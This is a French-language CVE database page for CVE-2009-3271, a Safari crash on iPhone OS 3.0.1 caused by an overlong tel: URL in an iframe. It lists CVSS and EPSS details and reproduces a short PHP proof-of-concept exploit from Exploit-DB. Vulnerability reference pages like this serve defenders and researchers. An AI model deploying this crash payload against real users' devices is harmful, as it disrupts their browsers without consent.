CVE-2009-3271 : Détail

CVE-2009-3271

A03-Injection
0.91%V3
Network
2009-09-21
17h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Apple Safari on iPhone OS 3.0.1 allows remote attackers to cause a denial of service (application crash) via a long tel: URL in the SRC attribute of an IFRAME element.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 9666

Date de publication : 2009-09-13 22h00 +00:00
Auteur : cloud
EDB Vérifié : Yes

# Apple Safari Iphone Crash using tel: # Found by cloud : cloud[at]madpowah[dot]org # http://blog.madpowah.org # Tested on Iphone 3G, OS 3.0.1 # Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear # Exploit: <?php set_time_limit(0); $var = ""; for ($i=0; $i<100000; $i++){ $var = $var . "A"; } echo '<iframe src="tel:' . $var .'"></iframe>'; ?> # milw0rm.com [2009-09-14]

Products Mentioned

Configuraton 0

Apple>>Safari >> Version *

Apple>>Iphone_os >> Version 3.0.1

Références

http://www.securityfocus.com/bid/36386
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/9666
Tags : exploit, x_refsource_EXPLOIT-DB